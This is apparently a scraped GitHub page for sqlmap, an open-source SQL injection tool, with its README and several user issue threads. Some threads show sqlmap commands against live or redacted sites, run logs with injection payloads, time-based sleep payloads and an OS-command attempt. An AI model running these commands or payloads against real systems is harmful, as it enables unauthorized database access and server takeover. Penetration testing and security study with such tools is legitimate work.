Automatic SQL injection and database takeover tool

Overview

sqlmap

Build Status Python 2.6|2.7|3.x License GitHub closed issues Twitter

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

sqlmap is sponsored by SpyderSec.

Screenshots

Screenshot

You can visit the collection of screenshots demonstrating some of the features on the wiki.

Installation

You can download the latest tarball by clicking here or latest zipball by clicking here.

Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6, 2.7 and 3.x on any platform.

Usage

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the user's manual.

Links

Translations

Comments
  • SQLmap and CVE-2014-1854

    SQLmap and CVE-2014-1854

    Hi,

    Attempting to fully exploit the following vulnerability with sqlmap: http://www.exploit-db.com/exploits/31834/

    You can download the Turnkey Wordpress appliance, then download the vulnerable version of adrotate here:

    http://downloads.wordpress.org/plugin/adrotate.3.9.4.zip

    Simply upload the zip and activate the plugin, you will be vulnerable. I can successfully exploit the SQLi using the PoC and various tinkerings. The fun thing about it is the SQLi result shows up in the Location header (and your HTTP code is 302, instead of 200 when it doesn't work). I have set --code=302 as well as --string='Location:', but I can't get SQLmap to detect it.

    You also must use --tamper=base64encode.

    A problem seems to be there is no body. The result of the first column selected in the payload is put in the Location header.

    opened by brandonprry 38
  • sqlmapapi prot question

    sqlmapapi prot question

    I would like to ask, sqlmapapi if activated will open a port, if I think this port can only visit a ip, sqlmap can be set up?If the port has been scanned, it means that others can access and use.

    enhancement normal miscellaneous 
    opened by M7lrv 28
  • Tor not working

    Tor not working

    can someone tell me, why I gets this error, when I use tor? In normal connecting without tor, all working.

    using python version 2.7
    sqlmap {1.0-dev-nongit-20150919}

    https://gyazo.com/e3ab8127d02ed761fe4723d2b17d43c4

    I use sqlmap.py -u "host" --dbs --tor --tor-type=SOCKS5 --tor-port=9150 --random-agent

    support 
    opened by Pablossoo 23
  • "sqlmap [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)"

    Hi Running sqlmap 1.0-dev, Kali linux up to date, tomcat 7, and latest WebGoat v5.4

    I can log into WebGoat via the browser http://localhost:8080/WebGoat-5.4/attack?Screen=153&menu=1100 with the login and password.

    I then tried to execute this:

    sqlmap -u "http://localhost:8080/WebGoat-5.4/attack?Screen=153&menu=1100" --banner --auth-type="Basic" --auth-cred="webgoat:webgoat"

    but it gives me:

    [*] starting at 17:11:09

    [17:11:09] [INFO] testing connection to the target URL [17:11:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [17:11:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [17:11:09] [WARNING] HTTP error codes detected during run: 401 (Unauthorized) - 1 times

    [*] shutting down at 17:11:09

    I did read the manual page and googled the terms “CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials” read some web sites, but still, I’m stumped. I have read the following links:

    https://github.com/sqlmapproject/sqlmap/issues/542 https://github.com/sqlmapproject/sqlmap/issues/125 http://tech4castblog.wordpress.com/2012/04/20/webgoat-http-authentication-type-and-valid-credentials-401-5/ (so is there a way to specify the port number 8080 to sqlmap? Shouldn’t sqlmap be able to figure out the port number since it’s specified in the URL?…is this the cause of error?)

    http://comments.gmane.org/gmane.comp.security.sqlmap/234

    the above came from the following google terms: “sqlmap [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)”

    Appreciate some help. Thanks. Gordon

    bug normal request 
    opened by gordonmasec 23
  • [CRITICAL] unable to retrieve the database names

    [CRITICAL] unable to retrieve the database names

    Hello! Why does not searchable database! I have changed in the Tour test comparison page

    C:\Python27\sqlmap>sqlmap.py -u "http://[REDACTED]/ksjh_list.aspx?year=2011"
    --level 5 --risk 3 --batch --tamper=between,charunicodeencode --dbs --dbms "Micr
    osoft SQL Server"
    
    
    
    [09:54:27] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
    n patch). Potential problems in enumeration phase can be expected
    GET parameter 'year' is vulnerable. Do you want to keep testing the others (if a
    ny)? [y/N] N
    sqlmap identified the following injection points with a total of 531 HTTP(s) req
    uests:
    
    ---
    Place: GET
    Parameter: year
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: year=2011 AND 2168=2168
    
    ---
    [09:54:27] [WARNING] changes made by tampering scripts are not included in shown
     payload content(s)
    [09:54:27] [INFO] testing MySQL
    [09:54:27] [WARNING] the back-end DBMS is not MySQL
    [09:54:27] [INFO] testing Oracle
    [09:54:28] [WARNING] the back-end DBMS is not Oracle
    [09:54:28] [INFO] testing PostgreSQL
    [09:54:29] [WARNING] the back-end DBMS is not PostgreSQL
    [09:54:29] [INFO] testing Microsoft SQL Server
    [09:54:29] [INFO] confirming Microsoft SQL Server
    [09:54:31] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2008
    web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
    back-end DBMS: Microsoft SQL Server 2008
    [09:54:31] [INFO] fetching database names
    [09:54:31] [INFO] fetching number of databases
    [09:54:31] [WARNING] running in a single-thread mode. Please consider usage of o
    ption '--threads' for faster data retrieval
    [09:54:31] [INFO] retrieved:
    [09:54:33] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    [09:54:33] [ERROR] unable to retrieve the number of databases
    [09:54:33] [INFO] retrieved:
    [09:54:36] [INFO] falling back to current database
    [09:54:36] [INFO] fetching current database
    [09:54:36] [INFO] retrieved:
    [09:54:40] [CRITICAL] unable to retrieve the database names
    [09:54:40] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 145 times
    
    [*] shutting down at 09:54:40
    
    
    C:\Python27\sqlmap>
    
    invalid support 
    opened by aiongw 23
  • sqlmap missing mandatory options!

    sqlmap missing mandatory options!

    I wanted to start SQLmap on kali linux but i got the following error: sqlmap error: missing a mandatory option (-d, -u, -l , -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or --h for advanced help.

    So i updated Kali Linux, still no fix. Then i downloaded it on windows with Python. still the same error...

    I hope you can help me.

    invalid 
    opened by dispater13 22
  • [CRITICAL] unable to execute operating system commands via the back-end DBMS

    [CRITICAL] unable to execute operating system commands via the back-end DBMS

    Hello, could you explain me pls what does it meen this error and what can i change in comnnad that this error delete. THANKS!

    ./sqlmap.py -u http://www.site.com/category.asp?category_id=6 --os-cmd -v l [00:54:07] [INFO] resuming back-end DBMS 'microsoft sql server' [00:54:07] [INFO] testing connection to the target URL

    sqlmap resumed the following injection point(s) from stored session:

    Parameter: category_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: category_id=6 AND 2290=2290

    [00:54:08] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP back-end DBMS: Microsoft SQL Server 2008 [00:54:08] [CRITICAL] unable to execute operating system commands via the back-end DBMS

    [*] shutting down at 00:54:08

    support 
    opened by AVR1234 22
  • ridiculous sqlmap issue

    ridiculous sqlmap issue

    The number of times where I've had a straight forward injection and sqlmap has failed to exploit it is unbelievable.

    One example was with a parameter vulnerable to time based sql injection after the order by clause, so the payload would be: vulnerableparameter=2,sleep(2)

    Another payload that works is: vulnerableparameter=2,(select/**/sleep(10)/**/from/**/dual/**/where/**/2/**/=/**/5)

    and then sqlmap should expand on that to get database,tables names etc.. etc. If it tries to end the query, it will break e.g using # or -- or any other comments it will break, so I told sqlmap not to use any and since spaces are not allowed, I also made it use mysql comments.

    I've tried: sqlmap.py -u "http://example.com/?vulnerableparameter=2" -p "vulnerableparameter" --prefix="," --suffix="" --technique=T --dbs --dbms=mysql --level=5 --risk=3 --tamper=space2comment

    and unbelievably, it said it was not injectable, unreal.

    How can sqlmap fail to find such simple injections?

    invalid 
    opened by crossedz 22
  • Asynchronous RESTful API to interact with sqlmap engine

    Asynchronous RESTful API to interact with sqlmap engine

    Design and develop an asynchronous RESTful API to interact with sqlmap engine. This is useful to use/call sqlmap from custom scripts, web interface, third-party tools or similar as opposed to use it from command line or wrap it as in a call similar to os.popen('sqlmap...').

    This API will replace the XML-RPC service (#287).

    enhancement normal miscellaneous 
    opened by bdamele 22
  • Skip sqlmap waf testing

    Skip sqlmap waf testing

    When I try to start testing with sqlmap, sqlmap will send queries like these :

    1'tFmggO<'">AeQpzc

    1"(,..,'(,,

    And my target will response with error 500 and sqlmap will show me connection dropped

    I tested my target manualy and it is okey

    So how should I skip those two queries? Or in which files I can comment this lines?

    Regards

    opened by johnyjin 20
  • can't injection eg. id[*]=0

    can't injection eg. id[*]=0

    id[*]=0 I want to inject inside like this: id[' aNd select * from user#]=1 or this: id[' aNd select * from user#]=

    but.. sqlmap payload: id[' aNd select * from user# 從我的 MI6,使用 FastHub 發送。

    從我的 MI6,使用 FastHub 發送。

    support 
    opened by 687766616e 20
Releases(1.7)
Owner
sqlmapproject
sqlmapproject
A blind SQL injection script that uses binary search aka bisection method to dump datas from database.

Blind SQL Injection I wrote this script to solve PortSwigger Web Security Academy's particular Blind SQL injection with conditional responses lab. Bec

Şefik Efe 2 Oct 29, 2022
WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities

WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities Which is a great tool for web pentesters. Coded in python3, CLI. WebScan is capable of scanning and detecting sql injection vulnerabilities across HTTP and HTTP sites.

AnonyminHack5 12 Dec 2, 2022
Aiminsun 165 Dec 21, 2022
A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence of a file

A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence o

null 2 Nov 9, 2022
Sqli-Scanner is a python3 script written to scan websites for SQL injection vulnerabilities

Sqli-Scanner is a python3 script written to scan websites for SQL injection vulnerabilities Features 1 Scan one website 2 Scan multiple websites Insta

Anontemitayo 9 Dec 30, 2022
CVE-2022-23046 - SQL Injection Vulnerability on PhpIPAM v1.4.4

CVE-2022-23046 PhpIPAM v1.4.4 allows an authenticated admin user to inject SQL s

null 2 Feb 15, 2022
HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

EntySec 100 Dec 23, 2022
Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries

Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries. Using xrefs to commonly injected and format string'd files, it will scan binaries faster than Firmware Slap.

Christopher Roberts 3 Nov 16, 2021
logmap: Log4j2 jndi injection fuzz tool

logmap - Log4j2 jndi injection fuzz tool Used for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path Use http

之乎者也 67 Oct 25, 2022
This is an injection tool that can inject any xposed modules apk into the debug android app

This is an injection tool that can inject any xposed modules apk into the debug android app, the native code in the xposed module can also be injected.

Windy 32 Nov 5, 2022
Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

CVE-2021-22911 Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1 The getPasswordPolicy method is vulnerable to NoS

Enox 47 Nov 9, 2022
Argument Injection in Dragonfly Ruby Gem

CVE-2021-33564 PoC Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem). Usage Arbitrary File Read python3 poc.py -u https://<

Michael Tsai 12 Nov 9, 2022
CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection Usage usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell] CVE-2021-2

r0cky 92 Jul 20, 2022
Reusable Lightweight Pythonic Dependency Injection Library

Vacuna Inject everything! Vacuna is a little library to provide dependency management for your python code. Install pip install vacuna Usage import va

Fernando Martínez González 16 Sep 15, 2021
Confluence OGNL injection

CVE-2021-26084 Confluence OGNL injection CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability in the Atlassian Conflue

Ashish Kunwar 15 Sep 23, 2022
POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL Pre-Auth RCE Injection Vulneralibity.

CVE-2021-26084 Description POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Pre-Auth RCE Injection V

antx 9 Aug 31, 2022
Dependency injection in python with autoconfiguration

The base is a DynamicContainer to autoconfigure services using the decorators @services for regular services and @command_handler for using command pattern.

Sergio Gómez 2 Jan 17, 2022
Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)

Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) CVE: CVE-2022-22947 CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947)

Carlos Vieira 35 Dec 28, 2022
Use FOFA automatic vulnerability scanning tool

AutoSRC Use FOFA automatic vulnerability scanning tool Usage python3 autosrc.py -e <FOFA EMAIL> -k <TOKEN> Screenshots License MIT Dev 6613GitHub6613

PwnWiki 48 Oct 25, 2022